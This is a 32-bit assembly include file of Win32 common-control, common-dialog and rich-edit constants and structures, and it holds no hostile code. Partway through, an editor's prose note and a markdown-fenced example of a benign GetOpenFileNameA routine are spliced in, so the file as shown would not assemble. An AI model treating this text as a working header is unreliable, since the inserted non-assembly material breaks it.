TVIS_OVERLAYMASK equ 0F00h
TVIS_STATEIMAGEMASK equ 0F000h
TVIS_USERMASK equ 0F000h
I_CHILDRENCALLBACK equ -1
TVI_ROOT equ 0FFFF0000h
TVI_FIRST equ 0FFFF0001h
TVI_LAST equ 0FFFF0002h
TVI_SORT equ 0FFFF0003h
TVM_INSERTITEM equ TV_FIRST+0
TVM_INSERTITEMW equ TV_FIRST+50
TVM_DELETEITEM equ TV_FIRST+1
TVM_EXPAND equ TV_FIRST+2
TVE_COLLAPSE equ 0001h
TVE_EXPAND equ 0002h
TVE_TOGGLE equ 0003h
TVE_COLLAPSERESET equ 8000h
TVM_GETITEMRECT equ TV_FIRST+4
TVM_GETCOUNT equ TV_FIRST+5
TVM_GETINDENT equ TV_FIRST+6
TVM_SETINDENT equ TV_FIRST+7
TVM_GETIMAGELIST equ TV_FIRST+8
TVSIL_NORMAL equ 0
TVSIL_STATE equ 2
TVM_SETIMAGELIST equ TV_FIRST+9
TVM_GETNEXTITEM equ TV_FIRST+10
TVGN_ROOT equ 0000h
TVGN_NEXT equ 0001h
TVGN_PREVIOUS equ 0002h
TVGN_PARENT equ 0003h
TVGN_CHILD equ 0004h
TVGN_FIRSTVISIBLE equ 0005h
TVGN_NEXTVISIBLE equ 0006h
TVGN_PREVIOUSVISIBLE equ 0007h
TVGN_DROPHILITE equ 0008h
TVGN_CARET equ 0009h
TVM_SELECTITEM equ TV_FIRST+11
TVM_GETITEM equ TV_FIRST+12
TVM_GETITEMW equ TV_FIRST+62
TVM_SETITEM equ TV_FIRST+13
TVM_SETITEMW equ TV_FIRST+63
TVM_EDITLABEL equ TV_FIRST+14
TVM_EDITLABELW equ TV_FIRST+65
TVM_GETEDITCONTROL equ TV_FIRST+15
TVM_GETVISIBLECOUNT equ TV_FIRST+16
TVM_HITTEST equ TV_FIRST+17
TVHT_NOWHERE equ 0001h
TVHT_ONITEMICON equ 0002h
TVHT_ONITEMLABEL equ 0004h
TVHT_ONITEMSTATEICON equ 0040h
TVHT_ONITEM equ TVHT_ONITEMICON|TVHT_ONITEMLABEL|TVHT_ONITEMSTATEICON
TVHT_ONITEMINDENT equ 0008h
TVHT_ONITEMBUTTON equ 0010h
TVHT_ONITEMRIGHT equ 0020h
TVHT_ABOVE equ 0100h
TVHT_BELOW equ 0200h
TVHT_TORIGHT equ 0400h
TVHT_TOLEFT equ 0800h
TVM_CREATEDRAGIMAGE equ TV_FIRST+18
TVM_SORTCHILDREN equ TV_FIRST+19
TVM_ENSUREVISIBLE equ TV_FIRST+20
TVM_SORTCHILDRENCB equ TV_FIRST+21
TVM_ENDEDITLABELNOW equ TV_FIRST+22
TVM_GETISEARCHSTRING equ TV_FIRST+23
TVM_GETISEARCHSTRINGW equ TV_FIRST+64
TVN_SELCHANGINGA equ TVN_FIRST-1
TVN_SELCHANGINGW equ TVN_FIRST-50
TVN_SELCHANGEDA equ TVN_FIRST-2
TVN_SELCHANGEDW equ TVN_FIRST-51
TVC_UNKNOWN equ 0000h
TVC_BYMOUSE equ 0001h
TVC_BYKEYBOARD equ 0002h
TVN_GETDISPINFOA equ TVN_FIRST-3
TVN_GETDISPINFOW equ TVN_FIRST-52
TVN_SETDISPINFOA equ TVN_FIRST-4
TVN_SETDISPINFOW equ TVN_FIRST-53
TVIF_DI_SETITEM equ 1000h
TVN_ITEMEXPANDING equ TVN_FIRST-5
TVN_ITEMEXPANDINGW equ TVN_FIRST-54
TVN_ITEMEXPANDED equ TVN_FIRST-6
TVN_ITEMEXPANDEDW equ TVN_FIRST-55
TVN_BEGINDRAG equ TVN_FIRST-7
TVN_BEGINDRAGW equ TVN_FIRST-56
TVN_BEGINRDRAG equ TVN_FIRST-8
TVN_BEGINRDRAGW equ TVN_FIRST-57
TVN_DELETEITEM equ TVN_FIRST-9
TVN_DELETEITEMW equ TVN_FIRST-58
TVN_BEGINLABELEDIT equ TVN_FIRST-10
TVN_BEGINLABELEDITW equ TVN_FIRST-59
TVN_ENDLABELEDIT equ TVN_FIRST-11
TVN_ENDLABELEDITW equ TVN_FIRST-60
TVN_KEYDOWN equ TVN_FIRST-12
TCS_FORCEICONLEFT equ 0010h
TCS_FORCELABELLEFT equ 0020h
TCS_TABS equ 0000h
TCS_BUTTONS equ 0100h
TCS_SINGLELINE equ 0000h
TCS_MULTILINE equ 0200h
TCS_RIGHTJUSTIFY equ 0000h
TCS_FIXEDWIDTH equ 0400h
TCS_RAGGEDRIGHT equ 0800h
TCS_FOCUSONBUTTONDOWN equ 1000h
TCS_OWNERDRAWFIXED equ 2000h
TCS_TOOLTIPS equ 4000h
TCS_FOCUSNEVER equ 8000h
TCM_FIRST equ 1300h
TCM_GETIMAGELIST equ TCM_FIRST+2
TCM_SETIMAGELIST equ TCM_FIRST+3
TCM_GETITEMCOUNT equ TCM_FIRST+4
TCIF_TEXT equ 0001h
TCIF_IMAGE equ 0002h
TCIF_RTLREADING equ 0004h
TCIF_PARAM equ 0008h
TCM_GETITEM equ TCM_FIRST+5
TCM_SETITEM equ TCM_FIRST+6
TCM_SETITEMW equ TCM_FIRST+61
TCM_INSERTITEM equ TCM_FIRST+7
TCM_INSERTITEMW equ TCM_FIRST+62
TCM_DELETEITEM equ TCM_FIRST+8
TCM_DELETEALLITEMS equ TCM_FIRST+9
TCM_GETITEMRECT equ TCM_FIRST+10
TCM_GETCURSEL equ TCM_FIRST+11
TCM_SETCURSEL equ TCM_FIRST+12
TCHT_NOWHERE equ 0001h
TCHT_ONITEMICON equ 0002h
TCHT_ONITEMLABEL equ 0004h
TCHT_ONITEM equ TCHT_ONITEMICON|TCHT_ONITEMLABEL
TCM_HITTEST equ TCM_FIRST+13
TCM_SETITEMEXTRA equ TCM_FIRST+14
TCM_ADJUSTRECT equ TCM_FIRST+40
TCM_SETITEMSIZE equ TCM_FIRST+41
TCM_REMOVEIMAGE equ TCM_FIRST+42
TCM_SETPADDING equ TCM_FIRST+43
TCM_GETROWCOUNT equ TCM_FIRST+44
TCM_GETTOOLTIPS equ TCM_FIRST+45
TCM_SETTOOLTIPS equ TCM_FIRST+46
TCM_GETCURFOCUS equ TCM_FIRST+47
TCM_SETCURFOCUS equ TCM_FIRST+48
TCN_KEYDOWN equ TCN_FIRST-0
TCN_SELCHANGE equ TCN_FIRST-1
TCN_SELCHANGING equ TCN_FIRST-2
ACS_CENTER equ 0001h
ACS_TRANSPARENT equ 0002h
ACS_AUTOPLAY equ 0004h
ACM_OPEN equ WM_USER+100
ACM_OPENW equ WM_USER+103
ACM_PLAY equ WM_USER+101
ACM_STOP equ WM_USER+102
ACN_START equ 1
ACN_STOP equ 2
;-------------------------comctl structures------------------------------
STRUC INIT_COMMON_CONTROLSEX
.dwSize RESD 1
.dwICC RESD 1
ENDSTRUC
STRUC REBARINFO
.cbSize RESD 1
.fMask RESD 1
.himl RESD 1
ENDSTRUC
STRUC REBARBANDINFO
.cbSize RESD 1
.fMask RESD 1
.fStyle RESD 1
.clrFore RESD 1
.clrBack RESD 1
.lpText RESD 1
.cch RESD 1
.iImage RESD 1
.hwndChild RESD 1
.cxMinChild RESD 1
.cyMinChild RESD 1
.lx RESD 1
.hbmBack RESD 1
.wID RESD 1
.cyChild RESD 1
.cyMaxChild RESD 1
.cyIntegral RESD 1
.cxIdeal RESD 1
.lParam RESD 1
.cxHeader RESD 1
ENDSTRUC
STRUC NMREBARCHILDSIZE
.hdr RESB NMHDR_size
.uBand RESD 1
.wID RESD 1
.rcChild RESB RECT_size
.rcBand RESB RECT_size
ENDSTRUC
STRUC NMREBAR
.hdr RESB NMHDR_size
.dwMask RESD 1
.uBand RESD 1
.fStyle RESD 1
.wID RESD 1
.lParam RESD 1
ENDSTRUC
STRUC NMRBAUTOSIZE
.hdr RESB NMHDR_size
.fChanged RESD 1
.rcTarget RESB RECT_size
.rcActual RESB RECT_size
ENDSTRUC
STRUC RB_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.iBand RESD 1 ; int in the SDK, not a WORD: RB_HITTEST writes 4 bytes here
ENDSTRUC
STRUC IMAGEINFO
.hbmImage RESD 1
.hbmMask RESD 1
.Unused1 RESD 1
.Unused2 RESD 1
.rcImage RESB RECT_size
ENDSTRUC
STRUC HD_ITEM
.imask RESD 1
.lxy RESD 1
.pszText RESD 1
.hbm RESD 1
.cchTextMax RESD 1
.fmt RESD 1
.lParam RESD 1
ENDSTRUC
STRUC HD_LAYOUT
.prc RESD 1
.pwpos RESD 1
ENDSTRUC
STRUC HD_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.iItem RESD 1
ENDSTRUC
STRUC HD_NOTIFY
.hdr RESB NMHDR_size
.iItem RESD 1
.iButton RESD 1
.pitem RESD 1
ENDSTRUC
STRUC TBBUTTON
.iBitmap RESD 1
.idCommand RESD 1
.fsState RESB 1
.fsStyle RESB 1
.bReserved RESB 2 ; 2 reserved bytes on Win32: sizeof(TBBUTTON) is 20, not 18
.dwData RESD 1
.iString RESD 1
ENDSTRUC
STRUC ColorMap
.cmFrom RESD 1
.cmTo RESD 1
ENDSTRUC
STRUC TBADDBITMAP
.hInst RESD 1
.nId RESD 1
ENDSTRUC
STRUC TBSAVEPARAMS
.hkr RESD 1
.pszSubKey RESD 1
.pszValueName RESD 1
ENDSTRUC
STRUC TBREPLACEBITMAP
.hInstOld RESD 1
.nIdOld RESD 1
.hInstNew RESD 1
.nIdNew RESD 1
.nButtons RESD 1
ENDSTRUC
STRUC TBNOTIFY
.hdr RESB NMHDR_size
.iItem RESD 1
.tbButton RESB TBBUTTON_size
.cchText RESD 1
.pszText RESD 1
ENDSTRUC
STRUC TOOLINFO
.cbSize RESD 1
.uFlags RESD 1
.hWnd RESD 1
.uId RESD 1
.rect RESB RECT_size
.hInst RESD 1
.lpszText RESD 1
.lParam RESD 1
ENDSTRUC
STRUC TT_HITTESTINFO
.hWnd RESD 1
.pt RESB POINT_size
.ti RESB TOOLINFO_size
ENDSTRUC
STRUC TOOLTIPTEXT
.hdr RESB NMHDR_size
.lpszText RESD 1
.szText RESB 80
.hInst RESD 1
.uFlags RESD 1
ENDSTRUC
STRUC DRAGLISTINFO
.uNotification RESD 1
.hWnd RESD 1
.ptCursor RESB POINT_size
ENDSTRUC
STRUC UDACCEL
.nSec RESD 1
.nInc RESD 1
ENDSTRUC
STRUC NM_UPDOWN
.hdr RESB NMHDR_size
.iPos RESD 1
.iDelta RESD 1
ENDSTRUC
STRUC LV_ITEM
.imask RESD 1
.iItem RESD 1
.iSubItem RESD 1
.state RESD 1
.stateMask RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
.lParam RESD 1
ENDSTRUC
STRUC LV_FINDINFO
.flags RESD 1
.psz RESD 1
.lParam RESD 1
.pt RESB POINT_size
.vkDirection RESD 1
ENDSTRUC
STRUC LV_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.iItem RESD 1
ENDSTRUC
STRUC LV_COLUMN
.imask RESD 1
.fmt RESD 1
.lx RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iSubItem RESD 1
ENDSTRUC
STRUC NM_LISTVIEW
.hdr RESB NMHDR_size
.iItem RESD 1
.iSubItem RESD 1
.uNewState RESD 1
.uOldState RESD 1
.uChanged RESD 1
.ptAction RESB POINT_size
.lParam RESD 1
ENDSTRUC
STRUC LV_DISPINFO
.hdr RESB NMHDR_size
.item RESB LV_ITEM_size ; NMLVDISPINFO embeds the whole LV_ITEM, not a pointer to it
ENDSTRUC
STRUC LV_KEYDOWN
.hdr RESB NMHDR_size
.wVKey RESW 1
.flags RESD 1
ENDSTRUC
STRUC TREEITEM
.dummy RESD 1
ENDSTRUC
STRUC TV_ITEM
.imask RESD 1
.hItem RESD 1
.state RESD 1
.stateMask RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
.iSelectedImage RESD 1
.cChildren RESD 1
.lParam RESD 1
ENDSTRUC
STRUC TV_INSERTSTRUCT
.hParent RESD 1
.hInsertAfter RESD 1
.item RESB TV_ITEM_size ; TV_INSERTSTRUCT embeds the whole TV_ITEM, not a pointer to it
ENDSTRUC
STRUC TV_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
.hItem RESD 1
ENDSTRUC
STRUC TV_SORTCB
.hParent RESD 1
.lpfnCompare RESD 1
.lParam RESD 1
ENDSTRUC
STRUC NM_TREEVIEW
.hdr RESB NMHDR_size
.action RESD 1
.itemOld RESD 1
.itemNew RESD 1
.ptDrag RESB POINT_size
ENDSTRUC
STRUC TV_DISPINFO
.hdr RESB NMHDR_size
.item RESB TV_ITEM_size ; NMTVDISPINFO embeds the whole TV_ITEM, not a pointer to it
ENDSTRUC
STRUC TV_KEYDOWN
.hdr RESB NMHDR_size
.wVKey RESW 1
.flags RESD 1
ENDSTRUC
STRUC TC_ITEMHEADER
.imask RESD 1
.lpReserved1 RESD 1
.lpReserved2 RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
ENDSTRUC
STRUC TC_ITEM
.imask RESD 1
.lpReserved1 RESD 1
.lpReserved2 RESD 1
.pszText RESD 1
.cchTextMax RESD 1
.iImage RESD 1
.lParam RESD 1
ENDSTRUC
STRUC TC_HITTESTINFO
.pt RESB POINT_size
.flags RESD 1
ENDSTRUC
STRUC TC_KEYDOWN
.hdr RESB NMHDR_size
.wVKey RESW 1
.flags RESD 1
ENDSTRUC
;--------------------------comdlg equates-------------------------------
CDERR_GENERALCODES equ 0000h
CDERR_STRUCTSIZE equ 0001h
CDERR_INITIALIZATION equ 0002h
CDERR_NOTEMPLATE equ 0003h
CDERR_NOHINSTANCE equ 0004h
CDERR_LOADSTRFAILURE equ 0005h
CDERR_FINDRESFAILURE equ 0006h
CDERR_LOADRESFAILURE equ 0007h
CDERR_LOCKRESFAILURE equ 0008h
CDERR_MEMALLOCFAILURE equ 0009h
CDERR_MEMLOCKFAILURE equ 000Ah
CDERR_NOHOOK equ 000Bh
CDERR_REGISTERMSGFAIL equ 000Ch
CC_RGBINIT equ 00000001h
CC_FULLOPEN equ 00000002h
CC_PREVENTFULLOPEN equ 00000004h
CC_SHOWHELP equ 00000008h
CC_ENABLEHOOK equ 00000010h
CC_ENABLETEMPLATE equ 00000020h
CC_ENABLETEMPLATEHANDLE equ 00000040h
CCERR_CHOOSECOLORCODES equ 5000h
FR_DOWN equ 00000001h
FR_WHOLEWORD equ 00000002h
FR_MATCHCASE equ 00000004h
FR_FINDNEXT equ 00000008h
FR_REPLACE equ 00000010h
FR_REPLACEALL equ 00000020h
FR_DIALOGTERM equ 00000040h
FR_SHOWHELP equ 00000080h
FR_ENABLEHOOK equ 00000100h
FR_ENABLETEMPLATE equ 00000200h
FR_NOUPDOWN equ 00000400h
FR_NOMATCHCASE equ 00000800h
FR_NOWHOLEWORD equ 00001000h
FR_ENABLETEMPLATEHANDLE equ 00002000h
FR_HIDEUPDOWN equ 00004000h
FR_HIDEMATCHCASE equ 00008000h
FR_HIDEWHOLEWORD equ 00010000h
FRERR_FINDREPLACECODES equ 4000h
FRERR_BUFFERLENGTHZERO equ 4001h
CF_SCREENFONTS equ 00000001h
CF_PRINTERFONTS equ 00000002h
CF_BOTH equ CF_SCREENFONTS+CF_PRINTERFONTS
CF_SHOWHELP equ 00000004h
CF_ENABLEHOOK equ 00000008h
CF_ENABLETEMPLATE equ 00000010h
CF_ENABLETEMPLATEHANDLE equ 00000020h
CF_INITTOLOGFONTSTRUCT equ 00000040h
CF_USESTYLE equ 00000080h
CF_EFFECTS equ 00000100h
CF_APPLY equ 00000200h
CF_ANSIONLY equ 00000400h
CF_NOVECTORFONTS equ 00000800h
CF_NOOEMFONTS equ CF_NOVECTORFONTS
CF_NOSIMULATIONS equ 00001000h
CF_LIMITSIZE equ 00002000h
CF_FIXEDPITCHONLY equ 00004000h
CF_WYSIWYG equ 00008000h
CF_FORCEFONTEXIST equ 00010000h
CF_SCALABLEONLY equ 00020000h
CF_TTONLY equ 00040000h
CF_NOFACESEL equ 00080000h
CF_NOSTYLESEL equ 00100000h
CF_NOSIZESEL equ 00200000h
CFERR_CHOOSEFONTCODES equ 2000h
CFERR_NOFONTS equ 2001h
CFERR_MAXLESSTHANMIN equ 2002h
WM_CHOOSEFONT_GETLOGFONT equ WM_USER+1
CD_LBSELNOITEMS equ -1
CD_LBSELCHANGE equ 0
CD_LBSELSUB equ 1
CD_LBSELADD equ 2
PD_ALLPAGES equ 00000000h
PD_SELECTION equ 00000001h
PD_PAGENUMS equ 00000002h
PD_NOSELECTION equ 00000004h
PD_NOPAGENUMS equ 00000008h
PD_COLLATE equ 00000010h
PD_PRINTTOFILE equ 00000020h
PD_PRINTSETUP equ 00000040h
PD_NOWARNING equ 00000080h
PD_RETURNDC equ 00000100h
PD_RETURNIC equ 00000200h
PD_RETURNDEFAULT equ 00000400h
PD_SHOWHELP equ 00000800h
PD_ENABLEPRINTHOOK equ 00001000h
PD_ENABLESETUPHOOK equ 00002000h
PD_ENABLEPRINTTEMPLATE equ 00004000h
PD_ENABLESETUPTEMPLATE equ 00008000h
PD_ENABLEPRINTTEMPLATEHANDLE equ 00010000h
PD_ENABLESETUPTEMPLATEHANDLE equ 00020000h
PD_USEDEVMODECOPIES equ 00040000h
PD_DISABLEPRINTTOFILE equ 00080000h
PD_HIDEPRINTTOFILE equ 00100000h
PDERR_PRINTERCODES equ 1000h
PDERR_SETUPFAILURE equ 1001h
PDERR_PARSEFAILURE equ 1002h
PDERR_RETDEFFAILURE equ 1003h
PDERR_LOADDRVFAILURE equ 1004h
PDERR_GETDEVMODEFAIL equ 1005h
PDERR_INITFAILURE equ 1006h
PDERR_NODEVICES equ 1007h
PDERR_NODEFAULTPRN equ 1008h
PDERR_DNDMMISMATCH equ 1009h
PDERR_CREATEICFAILURE equ 100Ah
PDERR_PRINTERNOTFOUND equ 100Bh
PDERR_DEFAULTDIFFERENT equ 100Ch
DN_DEFAULTPRN equ 0001h
OFN_ALLOWMULTISELECT equ 00000200h
OFN_CREATEPROMPT equ 00002000h
OFN_ENABLEHOOK equ 00000020h
OFN_ENABLETEMPLATE equ 00000040h
OFN_ENABLETEMPLATEHANDLE equ 00000080h
OFN_EXPLORER equ 00080000h
OFN_EXTENSIONDIFFERENT equ 00000400h
OFN_FILEMUSTEXIST equ 00001000h
OFN_HIDEREADONLY equ 00000004h
OFN_LONGNAMES equ 00200000h
OFN_NOCHANGEDIR equ 00000008h
OFN_NODEREFERENCELINKS equ 00100000h
OFN_NOLONGNAMES equ 00040000h
OFN_NONETWORKBUTTON equ 00020000h
OFN_NOREADONLYRETURN equ 00008000h
OFN_NOTESTFILECREATE equ 00010000h
OFN_NOVALIDATE equ 00000100h
OFN_OVERWRITEPROMPT equ 00000002h
OFN_PATHMUSTEXIST equ 00000800h
OFN_READONLY equ 00000001h
OFN_SHAREAWARE equ 00004000h
OFN_SHOWHELP equ 00000010h
OFN_SHAREFALLTHROUGH equ 2
OFN_SHARENOWARN equ 1
OFN_SHAREWARN equ 0
CDERR_DIALOGFAILURE equ 0FFFFh
FNERR_FILENAMECODES equ 3000h
FNERR_SUBCLASSFAILURE equ 3001h
FNERR_INVALIDFILENAME equ 3002h
FNERR_BUFFERTOOSMALL equ 3003h
;--------------------------comdlg structures----------------------------
STRUC CHOOSECOLORAPI
.lStructSize RESD 1
.hwndOwner RESD 1
.hInstance RESD 1
.rgbResult RESD 1
.lpCustColors RESD 1
.Flags RESD 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
ENDSTRUC
STRUC FINDREPLACE
.lStructSize RESD 1
.hWndOwner RESD 1
.hInstance RESD 1
.Flags RESD 1
.lpstrFindWhat RESD 1
.lpstrReplaceWith RESD 1
.wFindWhatLen RESW 1
.wReplaceWithLen RESW 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
ENDSTRUC
STRUC CHOOSEFONTAPI
.lStructSize RESD 1
.hWndOwner RESD 1
.hDC RESD 1
.lpLogFont RESD 1
.iPointSize RESD 1
.Flags RESD 1
.rgbColors RESD 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
.hInstance RESD 1
.lpszStyle RESD 1
.nFontType RESW 1
.Alignment RESW 1
.nSizeMin RESD 1
.nSizeMax RESD 1
ENDSTRUC
STRUC PRINTDLGAPI
.lStructSize RESD 1
.hWndOwner RESD 1
.hDevMode RESD 1
.hDevNames RESD 1
.hDC RESD 1
.Flags RESD 1
.nFromPage RESW 1
.nToPage RESW 1
.nMinPage RESW 1
.nMaxPage RESW 1
.nCopies RESW 1
.hInstance RESD 1
.lCustData RESD 1
.lpfnPrintHook RESD 1
.lpfnSetupHook RESD 1
.lpPrintTemplateName RESD 1
.lpPrintSetupTemplateName RESD 1
.hPrintTemplate RESD 1
.hSetupTemplate RESD 1
ENDSTRUC
STRUC OPENFILENAME
.lStructSize RESD 1
.hWndOwner RESD 1
.hInstance RESD 1
.lpstrFilter RESD 1
.lpstrCustomFilter RESD 1
.nMaxCustFilter RESD 1
.nFilterIndex RESD 1
.lpstrFile RESD 1
.nMaxFile RESD 1
.lpstrFileTitle RESD 1
.nMaxFileTitle RESD 1
.lpstrInitialDir RESD 1
.lpstrTitle RESD 1
.Flags RESD 1
.nFileOffset RESW 1
.nFileExtension RESW 1
.lpstrDefExt RESD 1
.lCustData RESD 1
.lpfnHook RESD 1
.lpTemplateName RESD 1
ENDSTRUC
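Added example for the OPENFILENAME structure above (this is editor-supplied code, not part of the original include nor any 29A program): an Open dialog whose lpstrFile buffer length is stated once and reported honestly in nMaxFile. GetOpenFileNameA writes the chosen path into lpstrFile and trusts nMaxFile as the only limit, so the two must be tied to one constant, and a FALSE return has to be split into "user cancelled" and "dialog failed" through CommDlgExtendedError. OFN_NOCHANGEDIR is set because the dialog otherwise changes the process' current directory, which silently alters where later relative-path opens and LoadLibrary calls resolve. Assumed here only: GetOpenFileNameA and CommDlgExtendedError are imported the way the host program imports the rest of its API, and the file is assembled as 32-bit code that includes the equates above.

```nasm
; Added example, not from the original include: Open dialog with the buffer
; length tied to nMaxFile and the failure cases told apart.
PATHBUF_LEN   equ 4096            ; the only place the buffer length is stated

section .bss
path_buf      resb PATHBUF_LEN    ; receives the full path, NUL-terminated
ofn           resb OPENFILENAME_size

section .data
exe_filter    db 'Executables (*.exe)',0,'*.exe',0,'All files',0,'*.*',0,0

section .text
; pick_file(hwndOwner) -- cdecl; returns the address of path_buf in eax on
; success, 0 if the user cancelled, -1 if the dialog itself failed
; (CommDlgExtendedError then held a CDERR_/FNERR_ code, e.g.
; FNERR_BUFFERTOOSMALL, in which case the first WORD of path_buf is the
; length that would have been needed).
pick_file:
    push ebp
    mov  ebp, esp
    push edi
    ; Zero the whole structure first: every field not set below must be 0,
    ; and path_buf[0] = 0 tells the dialog there is no initial file name.
    mov  edi, ofn
    mov  ecx, OPENFILENAME_size / 4
    xor  eax, eax
    rep  stosd
    mov  byte [path_buf], 0
    mov  dword [ofn+OPENFILENAME.lStructSize], OPENFILENAME_size
    mov  eax, [ebp+8]
    mov  [ofn+OPENFILENAME.hWndOwner], eax
    mov  dword [ofn+OPENFILENAME.lpstrFilter], exe_filter
    mov  dword [ofn+OPENFILENAME.nFilterIndex], 1
    mov  dword [ofn+OPENFILENAME.lpstrFile], path_buf
    mov  dword [ofn+OPENFILENAME.nMaxFile], PATHBUF_LEN
    mov  dword [ofn+OPENFILENAME.Flags], OFN_EXPLORER|OFN_FILEMUSTEXIST|OFN_PATHMUSTEXIST|OFN_HIDEREADONLY|OFN_NOCHANGEDIR
    push dword ofn
    call GetOpenFileNameA         ; stdcall: the callee removes the argument
    test eax, eax
    jnz  .ok
    call CommDlgExtendedError     ; 0 = cancelled, anything else = error code
    test eax, eax
    jz   .cancel
    mov  eax, -1
    jmp  .done
.cancel:
    xor  eax, eax
    jmp  .done
.ok:
    mov  eax, path_buf
.done:
    pop  edi
    leave
    ret
```

If OFN_ALLOWMULTISELECT is added to Flags the result is a directory followed by a double-NUL-terminated list of names and can be far longer than one path, which is why the buffer is sized generously and the FNERR_BUFFERTOOSMALL path is reported rather than ignored.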
;--------------------------riched equates-------------------------------
cchTextLimitDefault equ 32767
EM_CANPASTE equ WM_USER+50
EM_DISPLAYBAND equ WM_USER+51
EM_EXGETSEL equ WM_USER+52
EM_EXLIMITTEXT equ WM_USER+53
EM_EXLINEFROMCHAR equ WM_USER+54
EM_EXSETSEL equ WM_USER+55
EM_FINDTEXT equ WM_USER+56
EM_FORMATRANGE equ WM_USER+57
EM_GETCHARFORMAT equ WM_USER+58
EM_GETEVENTMASK equ WM_USER+59
EM_GETOLEINTERFACE equ WM_USER+60
EM_GETPARAFORMAT equ WM_USER+61
EM_GETSELTEXT equ WM_USER+62
EM_HIDESELECTION equ WM_USER+63
EM_PASTESPECIAL equ WM_USER+64
EM_REQUESTRESIZE equ WM_USER+65
EM_SELECTIONTYPE equ WM_USER+66
EM_SETBKGNDCOLOR equ WM_USER+67
EM_SETCHARFORMAT equ WM_USER+68
EM_SETEVENTMASK equ WM_USER+69
EM_SETOLECALLBACK equ WM_USER+70
EM_SETPARAFORMAT equ WM_USER+71
EM_SETTARGETDEVICE equ WM_USER+72
EM_STREAMIN equ WM_USER+73
EM_STREAMOUT equ WM_USER+74
EM_GETTEXTRANGE equ WM_USER+75
EM_FINDWORDBREAK equ WM_USER+76
EM_SETOPTIONS equ WM_USER+77
EM_GETOPTIONS equ WM_USER+78
EM_FINDTEXTEX equ WM_USER+79
EM_GETWORDBREAKPROCEX equ WM_USER+80
EM_SETWORDBREAKPROCEX equ WM_USER+81
EM_SETPUNCTUATION equ WM_USER+100
EM_GETPUNCTUATION equ WM_USER+101
EM_SETWORDWRAPMODE equ WM_USER+102
EM_GETWORDWRAPMODE equ WM_USER+103
EM_SETIMECOLOR equ WM_USER+104
EM_GETIMECOLOR equ WM_USER+105
EM_SETIMEOPTIONS equ WM_USER+106
EM_GETIMEOPTIONS equ WM_USER+107
EN_MSGFILTER equ 0700h
EN_REQUESTRESIZE equ 0701h
EN_SELCHANGE equ 0702h
EN_DROPFILES equ 0703h
EN_PROTECTED equ 0704h
EN_CORRECTTEXT equ 0705h
EN_STOPNOUNDO equ 0706h
EN_IMECHANGE equ 0707h
EN_SAVECLIPBOARD equ 0708h
EN_OLEOPFAILED equ 0709h
ENM_NONE equ 00000000h
ENM_CHANGE equ 00000001h
ENM_UPDATE equ 00000002h
ENM_SCROLL equ 00000004h
ENM_KEYEVENTS equ 00010000h
ENM_MOUSEEVENTS equ 00020000h
ENM_REQUESTRESIZE equ 00040000h
ENM_SELCHANGE equ 00080000h
ENM_DROPFILES equ 00100000h
ENM_PROTECTED equ 00200000h
ENM_CORRECTTEXT equ 00400000h
ENM_IMECHANGE equ 00800000h
ES_SAVESEL equ 00008000h
ES_SUNKEN equ 00004000h
ES_DISABLENOSCROLL equ 00002000h
ES_SELECTIONBAR equ 01000000h
ES_EX_NOCALLOLEINIT equ 01000000h
ES_VERTICAL equ 00400000h
ES_NOIME equ 00080000h
ES_SELFIME equ 00040000h
ECO_AUTOWORDSELECTION equ 00000001h
ECO_AUTOVSCROLL equ 00000040h
ECO_AUTOHSCROLL equ 00000080h
ECO_NOHIDESEL equ 00000100h
ECO_READONLY equ 00000800h
ECO_WANTRETURN equ 00001000h
ECO_SAVESEL equ 00008000h
ECO_SELECTIONBAR equ 01000000h
ECO_VERTICAL equ 00400000h
ECOOP_SET equ 0001h
ECOOP_OR equ 0002h
ECOOP_AND equ 0003h
ECOOP_XOR equ 0004h
WB_CLASSIFY equ 3
WB_MOVEWORDLEFT equ 4
WB_MOVEWORDRIGHT equ 5
WB_LEFTBREAK equ 6
WB_RIGHTBREAK equ 7
WB_MOVEWORDPREV equ 4
WB_MOVEWORDNEXT equ 5
WB_PREVBREAK equ 6
WB_NEXTBREAK equ 7
PC_FOLLOWING equ 1
PC_LEADING equ 2
PC_OVERFLOW equ 3
PC_DELIMITER equ 4
WBF_WORDWRAP equ 010h
WBF_WORDBREAK equ 020h
WBF_OVERFLOW equ 040h
WBF_LEVEL1 equ 080h
WBF_LEVEL2 equ 100h
WBF_CUSTOM equ 200h
IMF_FORCENONE equ 0001h
IMF_FORCEENABLE equ 0002h
IMF_FORCEDISABLE equ 0004h
IMF_CLOSESTATUSWINDOW equ 0008h
IMF_VERTICAL equ 0020h
IMF_FORCEACTIVE equ 0040h
IMF_FORCEINACTIVE equ 0080h
IMF_FORCEREMEMBER equ 0100h
WBF_CLASS equ 0Fh
WBF_ISWHITE equ 10h
WBF_BREAKLINE equ 20h
WBF_BREAKAFTER equ 40h
CFM_BOLD equ 00000001h
CFM_ITALIC equ 00000002h
CFM_UNDERLINE equ 00000004h
CFM_STRIKEOUT equ 00000008h
CFM_PROTECTED equ 00000010h
CFM_SIZE equ 80000000h
CFM_COLOR equ 40000000h
CFM_FACE equ 20000000h
CFM_OFFSET equ 10000000h
CFM_CHARSET equ 08000000h
CFE_BOLD equ 0001h
CFE_ITALIC equ 0002h
CFE_UNDERLINE equ 0004h
CFE_STRIKEOUT equ 0008h
CFE_PROTECTED equ 0010h
CFE_AUTOCOLOR equ 40000000h
yHeightCharPtsMost equ 1638
SCF_SELECTION equ 0001h
SCF_WORD equ 0002h
SF_TEXT equ 0001h
SF_RTF equ 0002h
SF_RTFNOOBJS equ 0003h
SF_TEXTIZED equ 0004h
SFF_SELECTION equ 8000h
SFF_PLAINRTF equ 4000h
MAX_TAB_STOPS equ 32
lDefaultTab equ 720
PFM_STARTINDENT equ 00000001h
PFM_RIGHTINDENT equ 00000002h
PFM_OFFSET equ 00000004h
PFM_ALIGNMENT equ 00000008h
PFM_TABSTOPS equ 00000010h
